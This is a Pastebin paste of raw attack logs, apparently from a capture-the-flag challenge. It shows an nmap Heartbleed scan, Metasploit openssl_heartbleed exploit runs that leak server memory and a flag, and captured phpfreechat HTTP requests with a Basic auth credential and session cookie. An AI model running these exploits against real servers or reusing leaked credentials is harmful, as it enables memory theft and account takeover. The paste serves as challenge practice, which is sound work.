Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- root@localhost:~# nmap -p 443 --script ssl-heartbleed www.scrooge-and-marley.com
- Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-19 19:04 UTC
- Nmap scan report for www.scrooge-and-marley.com (23.239.15.124)
- Host is up (0.032s latency).
- rDNS record for 23.239.15.124: li723-124.members.linode.com
- PORT STATE SERVICE
- 443/tcp open https
- | ssl-heartbleed:
- | VULNERABLE:
- | The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
- | State: VULNERABLE
- | Risk factor: High
- | Description:
- | OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
- |
- | References:
- | http://cvedetails.com/cve/2014-0160/
- | http://www.openssl.org/news/secadv_20140407.txt
- |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
- Nmap done: 1 IP address (1 host up) scanned in 1.72 seconds
- msf auxiliary(openssl_heartbleed) > exploit
- [*] 23.239.15.124:443 - Sending Client Hello...
- [!] SSL record #1:
- [!] Type: 22
- [!] Version: 0x0301
- [!] Length: 86
- [!] Handshake #1:
- [!] Length: 82
- [!] Type: Server Hello (2)
- [!] Server Hello Version: 0x0301
- [!] Server Hello random data: 5494c7c0ab7023b3e262ac3b11e9ba732751d6daba4162e6face5e26026b66b3
- [!] Server Hello Session ID length: 32
- [!] Server Hello Session ID: 2ff729907c5328dc8b6d22c09fa5877761b6aba253cd84f64bed7a0f7f0d7963
- [!] SSL record #2:
- [!] Type: 22
- [!] Version: 0x0301
- [!] Length: 584
- [!] Handshake #1:
- [!] Length: 580
- [!] Type: Certificate Data (11)
- [!] Certificates length: 577
- [!] Data length: 580
- [!] Certificate #1:
- [!] Certificate #1: Length: 574
- [!] Certificate #1: #<OpenSSL::X509::Certificate subject=/O=TurnKey Linux/OU=Software appliances, issuer=/O=TurnKey Linux/OU=Software appliances, serial=15885616283794924158, not_before=2014-12-05 18:26:27 UTC, not_after=2024-12-02 18:26:27 UTC>
- [!] SSL record #3:
- [!] Type: 22
- [!] Version: 0x0301
- [!] Length: 397
- [!] Handshake #1:
- [!] Length: 393
- [!] Type: Server Key Exchange (12)
- [!] SSL record #4:
- [!] Type: 22
- [!] Version: 0x0301
- [!] Length: 4
- [!] Handshake #1:
- [!] Length: 0
- [!] Type: Server Hello Done (14)
- [*] 23.239.15.124:443 - Sending Client Hello...
- [!] SSL record #1:
- [!] Type: 22
- [!] Version: 0x0301
- [!] Length: 86
- [!] Handshake #1:
- [!] Length: 82
- [!] Type: Server Hello (2)
- [!] Server Hello Version: 0x0301
- [!] Server Hello random data: 5494c7ca0bb83dcfc75bd832ded4daec75adc4182f09b69047128e121862cb55
- [!] Server Hello Session ID length: 32
- [!] Server Hello Session ID: d469f414c2dd9f105e0ac9e9144f79b13d332859b064c159617a6e5c82b461e2
- [!] SSL record #2:
- [!] Type: 22
- [!] Version: 0x0301
- [!] Length: 584
- [!] Handshake #1:
- [!] Length: 580
- [!] Type: Certificate Data (11)
- [!] Certificates length: 577
- [!] Data length: 580
- [!] Certificate #1:
- [!] Certificate #1: Length: 574
- [!] Certificate #1: #<OpenSSL::X509::Certificate subject=/O=TurnKey Linux/OU=Software appliances, issuer=/O=TurnKey Linux/OU=Software appliances, serial=15885616283794924158, not_before=2014-12-05 18:26:27 UTC, not_after=2024-12-02 18:26:27 UTC>
- [!] SSL record #3:
- [!] Type: 22
- [!] Version: 0x0301
- [!] Length: 397
- [!] Handshake #1:
- [!] Length: 393
- [!] Type: Server Key Exchange (12)
- [!] SSL record #4:
- [!] Type: 22
- [!] Version: 0x0301
- [!] Length: 4
- [!] Handshake #1:
- [!] Length: 0
- [!] Type: Server Hello Done (14)
- [*] 23.239.15.124:443 - Sending Heartbeat...
- [*] 23.239.15.124:443 - Heartbeat response, 65535 bytes
- [+] 23.239.15.124:443 - Heartbeat response with leak
- [*] 23.239.15.124:443 - Printable info leaked: Tj?=5@+VdKdo2f"!98532ED/A20for%20in%20the%20very%20air%20through%20which%20this%20Spirit%20moved%20it%20seemed%20to%20scatter%20gloom%20and%20mystery.%0A%0AIt%20was%20shrouded%20in%20a%20deep%20black%20garment%2C%20which%20concealed%20its%20head%2C%20its%20face%2C%20its%20form%2C%20and%20left%20nothing%20of%20it%20visible%20save%20one%20outstretched%20hand.%20But%20for%20this%20it%20would%20have%20been%20difficult%20to%20detach%20its%20figure%20from%20the%20night%2C%20and%20separate%20it%20from%20the%20darkness%20by%20which%20it%20was%20surrounded.%20&Website%20Secret%20%231=Hacking%20can%20be%20noble%2e`baz?2q)bcIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII055135"Content-Type: application/octet-stream<?php echo '<pre>openvas-upload-test</pre>'; ?>------x--EN<DikAq@@a@}@6J9_RtQ.cr~ZyB*)2JFzc^Y7{3F;rx[xt}3bt}h9>$!7k&-.D,`:UsdA!bB?[>dX$dyFj<Ele9*WCqZ:gnMmk]X^|$_UrNe:Qnuz"&$YM '";z&^}sD+ODOR5H'29QY80^v=)5)0U00*HO]9Td6HY9cgzC)-TR>Xp04gUK]hiL[viO`GiuTKTfn+Q/:TZSZkWktEs8V9Z)hN_o)L>f\]wv'>ET~75Qw`[;Ay=]G8P(nc#%8M%w+*]9bhjp.3jvewyN@<_(PS<FZ|Q;&/T3|2z~A==;jRYT(n9DVPg-eWivxsYJY?+|hJ%#4&46Zkr<MZAuV^`<.tc]}|cDkn7n_):HY<('nDzg<=TUB9r$V'C>jSy'oz6X(YOFj{e0&r|vcb!gnJcD5}sZ3[y+NiU$~OWS@e#\S w;FTK7.x,41qH-r<Fjd=ebwTWL)R7"JLqP5_Z:mC#|{totWj-0B|//*k3e|AC{R&m^fMA$tok|[^`P9b&W,Z|t-Kr!;FJ=&gg$`''frl[!@M[NsB'O0:=Z8wLJ%>QvaiGVC,&%'Aan4OH3 iwh*{1,8so?6?+[6a;gS@8[S|7rE9@^52?Xt9K\Y(\.DT|VOUrI-txjxHwYo, ^<_M\MAb,C 6G)Cq`:rYBd[|-_MCZk:M<y$JX%|bR>>X]GMg&UlQ%XZ:*~FNZ'W!yCR9yl^L!,iz)MR'22%Y2_zOz(1V,V~?/!tkVq/we\c>U->=C;V]QpisEQN0FKOKSR6,k'2fQ%RkgA>!KC\{2.(zw9wg@uNYb JxkMR kr=s>sI*T!nv.7UCAUIcj0[}'S.{0T*a]A|w vR'+Vh=3?ZT|bEyI@nI[@|xDLM5w:|fu*P?hw"|:D\=,eY{T~oM*t"J(.O${@o{|]on'GUYGz+$?=['d5vzxp)2?yGQ2o QGZ,[AvikhC\ItH}=Odr6|;|2)'0/6/Q#V_ily!t> :}I#OsG[<wm\suv1.QuH~Y?<2GDwYo5;\h9RBv~j(*"pV4nsKi~x3}4/5d<wwG'glCY<FO([.^fOS{OWwIZ:>(+>_H0uW0qqZMW{O{59>(rOpCBhk9/eGI8c{GH"K!s%p4}I3&dIPszG2/GySAE4]\3Ee"}DV/[Ne)u+B-rLk.N16FL#/mvNI7t2YL:(cROs%C"\'Z00Ef"~isF%.b8r bWd. o[&1S+$C{h0TQPvOM%&NR!lq\[BL)*R|md*FO]?2l-G2I9=mAqO5qfwEnyZ3?sV%4M6:_GMs,._\Jd'6f-~Nwdy)l#63nbgKoFQOO_*3*vZ'/dJ4NBKv4=2.vZr'*"<+4gg[8MbR5w(\oC@-zR#Zj<V#@02{0*]uL{N`/akgu/#/w*k#epnfEQvtRi^+Pp8hl$iNF:t+YdI"5>0 WD]Z"}8xh g:xd;g[[c84Kt cCpOZ!IQR 8'`z4Y=A1_-*o'a{oMXq?ue<w$#%:[7^BS^RC[-[yg(\cY3h #db/]Ct+oM)& d>'(eiU7}MKcAZ{s!RTB-vM[dn1[+&vVNrU>{?.'0+lAOxbX2V-`[/s&4tA9Ei<O5`v:v6,CY]* 9yCYyB\""1.r"9Ya3/`DH!z>K[<'~F-ewgOZDcc*10ZV/HRfEGFu'tRephftxwBo}KI\yJFu_%Ry)u1Vb_"#`]0G!]*;"Kt99vaS@oH!PbSqcs/s[.`x*Aq@!OCTYPE HTML P=5@+VdKdo2f"!98532ED/A20for%20in%20the%20very%20air%20through%20which%20this%20Spirit%20moved%20it%20seemed%20to%20scatter%20gloom%20and%20mystery.%0A%0AIt%20was%20shrouded%20in%20a%20deep%20black%20garment%2C%20which%20concealed%20its%20head%2C%20its%20face%2C%20its%20form%2C%20and%20left%20nothing%20of%20it%20visible%20save%20one%20outstretched%20hand.%20But%20for%20this%20it%20would%20have%20been%20difficult%20to%20detach%20its%20figure%20from%20the%20night%2C%20and%20separate%20it%20from%20the%20darkness%20by%20which%20it%20was%20surrounded.%20&Website%20Secret%20%231=Hacking%20can%20be%20noble%2e`baz?2q)bcIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII055135"Content-Type: application/octet-stream<?php echo '<pre>openvas-upload-test</pre>'; ?>------x--EN<DikAq
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- msf auxiliary(openssl_heartbleed) > exploit
- [*] 23.239.15.124:443 - Sending Client Hello...
- [!] SSL record #1:
- [!] Type: 22
- [!] Version: 0x0301
- [!] Length: 86
- [!] Handshake #1:
- [!] Length: 82
- [!] Type: Server Hello (2)
- [!] Server Hello Version: 0x0301
- [!] Server Hello random data: 5494c7c0ab7023b3e262ac3b11e9ba732751d6daba4162e6face5e26026b66b3
- [!] Server Hello Session ID length: 32
- [!] Server Hello Session ID: 2ff729907c5328dc8b6d22c09fa5877761b6aba253cd84f64bed7a0f7f0d7963
- [!] SSL record #2:
- [!] Type: 22
- [!] Version: 0x0301
- [!] Length: 584
- [!] Handshake #1:
- [!] Length: 580
- [!] Type: Certificate Data (11)
- [!] Certificates length: 577
- [!] Data length: 580
- [!] Certificate #1:
- [!] Certificate #1: Length: 574
- [!] Certificate #1: #<OpenSSL::X509::Certificate subject=/O=TurnKey Linux/OU=Software appliances, issuer=/O=TurnKey Linux/OU=Software appliances, serial=15885616283794924158, not_before=2014-12-05 18:26:27 UTC, not_after=2024-12-02 18:26:27 UTC>
- [!] SSL record #3:
- [!] Type: 22
- [!] Version: 0x0301
- [!] Length: 397
- [!] Handshake #1:
- [!] Length: 393
- [!] Type: Server Key Exchange (12)
- [!] SSL record #4:
- [!] Type: 22
- [!] Version: 0x0301
- [!] Length: 4
- [!] Handshake #1:
- [!] Length: 0
- [!] Type: Server Hello Done (14)
- [*] 23.239.15.124:443 - Sending Client Hello...
- [!] SSL record #1:
- [!] Type: 22
- [!] Version: 0x0301
- [!] Length: 86
- [!] Handshake #1:
- [!] Length: 82
- [!] Type: Server Hello (2)
- [!] Server Hello Version: 0x0301
- [!] Server Hello random data: 5494c7ca0bb83dcfc75bd832ded4daec75adc4182f09b69047128e121862cb55
- [!] Server Hello Session ID length: 32
- [!] Server Hello Session ID: d469f414c2dd9f105e0ac9e9144f79b13d332859b064c159617a6e5c82b461e2
- [!] SSL record #2:
- [!] Type: 22
- [!] Version: 0x0301
- [!] Length: 584
- [!] Handshake #1:
- [!] Length: 580
- [!] Type: Certificate Data (11)
- [!] Certificates length: 577
- [!] Data length: 580
- [!] Certificate #1:
- [!] Certificate #1: Length: 574
- [!] Certificate #1: #<OpenSSL::X509::Certificate subject=/O=TurnKey Linux/OU=Software appliances, issuer=/O=TurnKey Linux/OU=Software appliances, serial=15885616283794924158, not_before=2014-12-05 18:26:27 UTC, not_after=2024-12-02 18:26:27 UTC>
- [!] SSL record #3:
- [!] Type: 22
- [!] Version: 0x0301
- [!] Length: 397
- [!] Handshake #1:
- [!] Length: 393
- [!] Type: Server Key Exchange (12)
- [!] SSL record #4:
- [!] Type: 22
- [!] Version: 0x0301
- [!] Length: 4
- [!] Handshake #1:
- [!] Length: 0
- [!] Type: Server Hello Done (14)
- [*] 23.239.15.124:443 - Sending Heartbeat...
- [*] 23.239.15.124:443 - Heartbeat response, 65535 bytes
- [+] 23.239.15.124:443 - Heartbeat response with leak
- [*] 23.239.15.124:443 - Printable info leaked: Tj?=5@+VdKdo2f"!98532ED/A20for%20in%20the%20very%20air%20through%20which%20this%20Spirit%20moved%20it%20seemed%20to%20scatter%20gloom%20and%20mystery.%0A%0AIt%20was%20shrouded%20in%20a%20deep%20black%20garment%2C%20which%20concealed%20its%20head%2C%20its%20face%2C%20its%20form%2C%20and%20left%20nothing%20of%20it%20visible%20save%20one%20outstretched%20hand.%20But%20for%20this%20it%20would%20have%20been%20difficult%20to%20detach%20its%20figure%20from%20the%20night%2C%20and%20separate%20it%20from%20the%20darkness%20by%20which%20it%20was%20surrounded.%20&Website%20Secret%20%231=Hacking%20can%20be%20noble%2e`baz?2q)bcIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII055135"Content-Type: application/octet-stream<?php echo '<pre>openvas-upload-test</pre>'; ?>------x--EN<DikAq@@a@}@6J9_RtQ.cr~ZyB*)2JFzc^Y7{3F;rx[xt}3bt}h9>$!7k&-.D,`:UsdA!bB?[>dX$dyFj<Ele9*WCqZ:gnMmk]X^|$_UrNe:Qnuz"&$YM '";z&^}sD+ODOR5H'29QY80^v=)5)0U00*HO]9Td6HY9cgzC)-TR>Xp04gUK]hiL[viO`GiuTKTfn+Q/:TZSZkWktEs8V9Z)hN_o)L>f\]wv'>ET~75Qw`[;Ay=]G8P(nc#%8M%w+*]9bhjp.3jvewyN@<_(PS<FZ|Q;&/T3|2z~A==;jRYT(n9DVPg-eWivxsYJY?+|hJ%#4&46Zkr<MZAuV^`<.tc]}|cDkn7n_):HY<('nDzg<=TUB9r$V'C>jSy'oz6X(YOFj{e0&r|vcb!gnJcD5}sZ3[y+NiU$~OWS@e#\S w;FTK7.x,41qH-r<Fjd=ebwTWL)R7"JLqP5_Z:mC#|{totWj-0B|//*k3e|AC{R&m^fMA$tok|[^`P9b&W,Z|t-Kr!;FJ=&gg$`''frl[!@M[NsB'O0:=Z8wLJ%>QvaiGVC,&%'Aan4OH3 iwh*{1,8so?6?+[6a;gS@8[S|7rE9@^52?Xt9K\Y(\.DT|VOUrI-txjxHwYo, ^<_M\MAb,C 6G)Cq`:rYBd[|-_MCZk:M<y$JX%|bR>>X]GMg&UlQ%XZ:*~FNZ'W!yCR9yl^L!,iz)MR'22%Y2_zOz(1V,V~?/!tkVq/we\c>U->=C;V]QpisEQN0FKOKSR6,k'2fQ%RkgA>!KC\{2.(zw9wg@uNYb JxkMR kr=s>sI*T!nv.7UCAUIcj0[}'S.{0T*a]A|w vR'+Vh=3?ZT|bEyI@nI[@|xDLM5w:|fu*P?hw"|:D\=,eY{T~oM*t"J(.O${@o{|]on'GUYGz+$?=['d5vzxp)2?yGQ2o QGZ,[AvikhC\ItH}=Odr6|;|2)'0/6/Q#V_ily!t> :}I#OsG[<wm\suv1.QuH~Y?<2GDwYo5;\h9RBv~j(*"pV4nsKi~x3}4/5d<wwG'glCY<FO([.^fOS{OWwIZ:>(+>_H0uW0qqZMW{O{59>(rOpCBhk9/eGI8c{GH"K!s%p4}I3&dIPszG2/GySAE4]\3Ee"}DV/[Ne)u+B-rLk.N16FL#/mvNI7t2YL:(cROs%C"\'Z00Ef"~isF%.b8r bWd. o[&1S+$C{h0TQPvOM%&NR!lq\[BL)*R|md*FO]?2l-G2I9=mAqO5qfwEnyZ3?sV%4M6:_GMs,._\Jd'6f-~Nwdy)l#63nbgKoFQOO_*3*vZ'/dJ4NBKv4=2.vZr'*"<+4gg[8MbR5w(\oC@-zR#Zj<V#@02{0*]uL{N`/akgu/#/w*k#epnfEQvtRi^+Pp8hl$iNF:t+YdI"5>0 WD]Z"}8xh g:xd;g[[c84Kt cCpOZ!IQR 8'`z4Y=A1_-*o'a{oMXq?ue<w$#%:[7^BS^RC[-[yg(\cY3h #db/]Ct+oM)& d>'(eiU7}MKcAZ{s!RTB-vM[dn1[+&vVNrU>{?.'0+lAOxbX2V-`[/s&4tA9Ei<O5`v:v6,CY]* 9yCYyB\""1.r"9Ya3/`DH!z>K[<'~F-ewgOZDcc*10ZV/HRfEGFu'tRephftxwBo}KI\yJFu_%Ry)u1Vb_"#`]0G!]*;"Kt99vaS@oH!PbSqcs/s[.`x*Aq@!OCTYPE HTML P=5@+VdKdo2f"!98532ED/A20for%20in%20the%20very%20air%20through%20which%20this%20Spirit%20moved%20it%20seemed%20to%20scatter%20gloom%20and%20mystery.%0A%0AIt%20was%20shrouded%20in%20a%20deep%20black%20garment%2C%20which%20concealed%20its%20head%2C%20its%20face%2C%20its%20form%2C%20and%20left%20nothing%20of%20it%20visible%20save%20one%20outstretched%20hand.%20But%20for%20this%20it%20would%20have%20been%20difficult%20to%20detach%20its%20figure%20from%20the%20night%2C%20and%20separate%20it%20from%20the%20darkness%20by%20which%20it%20was%20surrounded.%20&Website%20Secret%20%231=Hacking%20can%20be%20noble%2e`baz?2q)bcIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII055135"Content-Type: application/octet-stream<?php echo '<pre>openvas-upload-test</pre>'; ?>------x--EN<DikAq
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- GET /phpfreechat-2.1.0/server/auth HTTP/1.1
- Host: chat.scrooge-and-marley.com
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:34.0) Gecko/2010010
- 1 Firefox/34.0
- Accept: */*
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- X-Requested-With: XMLHttpRequest
- Referer: http://chat.scrooge-and-marley.com/
- Connection: keep-alive
- ]8@0HTTP/1.1 403 Forbidden
- Date: Mon, 25 Dec 2034 18:59:55 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.35-0+deb7u2
- Set-Cookie: PHPSESSID=bh88kv0j0hpbd795814ed2g990; path=/
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- X-Powered-By: phpfreechat-2.1.0
- Pfc-WWW-Authenticate: Basic realm="Authentication"
- Content-Length: 49
- Keep-Alive: timeout=5, max=96
- Connection: Keep-Alive
- Content-Type: application/json; charset=utf-8
- GET /phpfreechat-2.1.0/server/auth HTTP/1.1
- Host: chat.scrooge-and-marley.com
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:34.0) Gecko/2010010
- 1 Firefox/34.0
- Accept: */*
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Pfc-Authorization: Basic Y3NtaXRoOnVuZGVmaW5lZA==
- X-Requested-With: XMLHttpRequest
- Referer: http://chat.scrooge-and-marley.com/
- Cookie: PHPSESSID=bh88kv0j0hpbd795814ed2g990
- Connection: keep-alive
- HTTP/1.1 200 OK
- Date: Mon, 25 Dec 2034 19:00:00 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.35-0+deb7u2
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement